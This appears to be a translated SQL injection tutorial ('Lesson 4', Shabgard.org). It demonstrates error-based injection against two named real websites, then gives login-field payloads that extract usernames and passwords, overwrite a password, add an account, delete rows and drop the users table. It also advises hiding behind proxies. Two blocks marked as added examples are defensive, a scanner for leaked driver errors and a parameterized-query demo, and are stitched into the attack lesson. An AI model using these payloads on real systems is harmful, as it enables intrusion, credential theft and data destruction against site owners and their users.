Lesson 4

  • November 2019
SQL Injection (Lesson ) (Using SQL Server)

I only ask that, now that we are going to proceed by example, you do not under any circumstances misuse the information of the target sites, so that I am not put under pressure and these examples can continue.

Examples from lesson (I don't think an explanation is needed)

getting table names and column names

http://www.iribnews.ir/Full_fa.asp?news_id= (target site)

http://www.iribnews.ir/Full_fa.asp?news_id='
Microsoft OLE DB Provider for SQL Server error 'e'
Unclosed quotation mark before the character string ''.
/Full_fa.asp, line

http://www.iribnews.ir/Full_fa.asp?news_id='%'%having%=-
Microsoft OLE DB Provider for SQL Server error 'e'
Column 'iribnews_fa.Lead' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/Full_fa.asp, line

iribnews_fa = the table name
Lead = the first column name

http://www.iribnews.ir/Full_fa.asp?news_id=''%group%by%iribnews_fa.Lead%having%=-
Microsoft OLE DB Provider for SQL Server error 'e'
Column 'iribnews_fa.Title' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Full_fa.asp, line

http://www.iribnews.ir/Full_fa.asp?news_id=''%group%by%iribnews_fa.Lead,iribnews_fa.Title%having%=-
Microsoft OLE DB Provider for SQL Server error 'e'
Column 'iribnews_fa.date' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Full_fa.asp, line

In the same way we obtain the information about the columns.

=> iribnews_fa.Lead, iribnews_fa.Title, iribnews_fa.date, iribnews_fa.time, iribnews_fa.fa_date, iribnews_fa.news_num, iribnews_fa.Type, iribnews_fa.code, iribnews_fa.prm_news, iribnews_fa.sec_news, iribnews_fa.keyword, iribnews_fa.content, iribnews_fa.ext_link, iribnews_fa.ext_link, iribnews_fa.ext_link, iribnews_fa.pic_path, iribnews_fa.pic_path, iribnews_fa.pic_path, iribnews_fa.video, iribnews_fa.Audio_path, iribnews_fa.Audio_path, iribnews_fa.Audio_path, iribnews_fa.Video_path, iribnews_fa.Video_path, iribnews_fa.Video_path

getting column types

http://www.iribnews.ir/Full_fa.asp?news_id='%'%union%select%sum(title)%from%iribnews_fa--
Microsoft OLE DB Provider for SQL Server error 'e'
The sum or average aggregate operation cannot take a varchar data type as an argument.
/Full_fa.asp, line

=> is non-numerical

In this example it is better that we go no further than this.

Here is an example of getting server information:

getting the version number of server

http://www.abong.org.br/novosite/institucional/associadas_pagpubli.asp?midia=Folhetos'%UNION%ALL%SELECT%null,null,null, @@version,null,null,null,null,null,null,null,null,--

Microsoft SQL Server - ..(Intel X) May ::Copyright (c) -Microsoft Corporation Enterprise Edition on Windows NT .(Build : Service Pack )
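Every step above works only because the application returns the database driver's error text to the browser. The following is an added example, not part of the original lesson: a defender-side check that scans response bodies for the error wording quoted in this lesson (including the conversion error that appears in the login section further down) and reports what each message discloses. The function names and the sample bodies are constructed for illustration.

```python
import re

# Error wording quoted in the lesson, mapped to what each message discloses.
LEAK_SIGNATURES = [
    ("unbalanced-quote", "raw input reached the SQL parser",
     re.compile(r"Unclosed quotation mark before the character string")),
    ("schema-name", "table and column name",
     re.compile(r"Column '(?P<table>\w+)\.(?P<column>\w+)' is invalid in the select list")),
    ("column-type", "column data type",
     re.compile(r"aggregate operation cannot take a (?P<type>\w+) data type")),
    ("row-value", "stored value echoed by a conversion error",
     re.compile(r"converting the (?:varchar|character) value ['‘](?P<value>[^'’]*)['’]")),
]
PROVIDER = re.compile(r"Microsoft OLE DB Provider for (?:SQL Server|ODBC)", re.I)

def classify_response(body):
    """Return [(kind, discloses, details)] for one HTTP response body."""
    if not PROVIDER.search(body):
        return []
    findings = []
    for kind, discloses, pattern in LEAK_SIGNATURES:
        for m in pattern.finditer(body):
            details = m.groupdict()
            if "value" in details:  # never copy leaked data into the report
                details["value"] = "<%d chars>" % len(details["value"])
            findings.append((kind, discloses, details))
    return findings

def audit(responses):
    """responses: iterable of (path, body). Returns {path: findings} for leaking pages."""
    report = {}
    for path, body in responses:
        found = classify_response(body)
        if found:
            report.setdefault(path, []).extend(found)
    return report

# Constructed sample bodies that reuse the error wording quoted in the lesson.
SAMPLES = [
    ("/Full_fa.asp", "Microsoft OLE DB Provider for SQL Server error\n"
     "Column 'iribnews_fa.Lead' is invalid in the select list because it is not "
     "contained in an aggregate function and there is no GROUP BY clause."),
    ("/login.asp", "Microsoft OLE DB provider for ODBC driver error\n"
     "syntax error converting the varchar value ‘ehsan’ to a column of data type int."),
    ("/index.asp", "<html><body>Something went wrong. Reference 7f3a.</body></html>"),
]

if __name__ == "__main__":
    for path, findings in audit(SAMPLES).items():
        print(path, findings)
```

Any page this check flags should be switched to a generic error page, with the driver message written only to the server log.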

Well, friends, before starting the new lesson you need to pay attention to one point: using a proxy when injecting. From here on, this is necessary for staying anonymous.

If staying anonymous is very important to you, I suggest reading http://www.stayinvisible.com

Well, we now have the table names, the column names and the column types, so let's begin. Assume:

table names = users
column names = username, password

Getting Username & Password from table:

- Login: ' union select min (name), ,from users where username > 'a';-
Microsoft OLE DB provider for ODBC driver error ‘e’
[Microsoft][ODBC SQL server driver][SQL server] syntax error converting the varchar value ‘ehsan’ to a column of data type int.
/login.asp, line

Using the command above, one can discover the usernames that exist in the database: ehsan. To find the other users we proceed as follows:

- Login: ' union select min (name), ,from users where username > 'ehsan' ; -
Microsoft OLE DB provider for ODBC driver error ‘e’
[Microsoft][ODBC SQL server driver][SQL server] syntax error converting the varchar value ‘ahmadi’ to a column of data type int.
/login.asp, line

Well, now that we have the username, we can either use the UPDATE command and change the password (the UPDATE command is explained further on), or proceed as follows:

- Login: ' union select password, ,from users where username ='ehsan' ; -
Microsoft OLE DB provider for ODBC driver error ‘e’
[Microsoft] [ODBC SQL Server Driver] [SQL Server] syntax error converting the character value ‘frft’ to a column of a data type Int.

Looking carefully at the error above, we see that ehsan's password is frft.

Of course, there are ways to view all of the usernames and passwords at once, which we will cover in later lessons.

To change the desired values in the database we use the UPDATE command:

- Login: ' UPDATE users set users.password = 'ffk' where (users.username = 'ehsan'); --
- Pass:

With the command above we change the password of the user ehsan to ffk.

Then Login with :

- Login: ehsan
- Pass: ffk

Using the INSERT command you can add the desired values to the database.

- Login: ' insert into users(users.username,users.password) values ('ali',''); - -
- Pass:

With the command above we can create a username named ali, and with a password.

Then Login with :

- Login: ali
- Pass:

Using the Delete command we delete the desired values from the database.

- Login: ehsan' delete from users; --

The command above deletes the user ehsan.

Using the Drop command one can delete the database; however, using this command is not recommended.

- Login: ' drop table users; -

I have tried to keep the material useful and concise. There are a few fine points in these commands that you may run into; in any case, I will try to cover these fine points too in the future.
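The login inputs in this lesson succeed because the page splices the Login field into the SQL text. The following is an added example, not part of the original lesson, showing the vulnerable string-building pattern beside a parameterized lookup, with the lesson's own inputs replayed against the parameterized version. It assumes Python's sqlite3 as a stand-in for SQL Server; the function names and the second table row are constructed for illustration.

```python
import sqlite3

# Login-field inputs quoted in the lesson, copied as they appear on the page.
LESSON_INPUTS = [
    "' UPDATE users set users.password = 'ffk' where (users.username = 'ehsan'); --",
    "ehsan' delete from users; --",
    "' drop table users; --",
]

def make_db():
    """In-memory stand-in for the lesson's users table; the second row is constructed."""
    conn = sqlite3.connect(":memory:")
    # Plaintext passwords only mirror the lesson's table; store salted hashes in practice.
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("ehsan", "frft"), ("ahmadi", "constructed-pw")])
    return conn

def unsafe_sql(login, password):
    """Vulnerable pattern: input is spliced into the SQL text. Built here, never executed."""
    return ("SELECT username FROM users WHERE username = '" + login +
            "' AND password = '" + password + "'")

def safe_login(conn, login, password):
    """Bound parameters stay data: quotes and keywords in them are never parsed as SQL."""
    try:
        row = conn.execute(
            "SELECT 1 FROM users WHERE username = ? AND password = ?",
            (login, password)).fetchone()
    except sqlite3.Error:
        return False  # fail closed; no driver error text reaches the caller
    return row is not None

def snapshot(conn):
    """Table contents, used to confirm that a login attempt changed nothing."""
    return conn.execute(
        "SELECT username, password FROM users ORDER BY username").fetchall()

def replay_lesson_inputs():
    """Feed every lesson input through safe_login; return (results, table_unchanged)."""
    conn = make_db()
    before = snapshot(conn)
    results = [safe_login(conn, text, "") for text in LESSON_INPUTS]
    return results, snapshot(conn) == before
```

On SQL Server the same separation comes from parameterized commands in ADO/ODBC, and it is reinforced by giving the web application's database login no rights to alter or drop tables.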



Author: [email protected]

Copyright © Shabgard.org. All rights reserved. http://isun.Shabgard.org
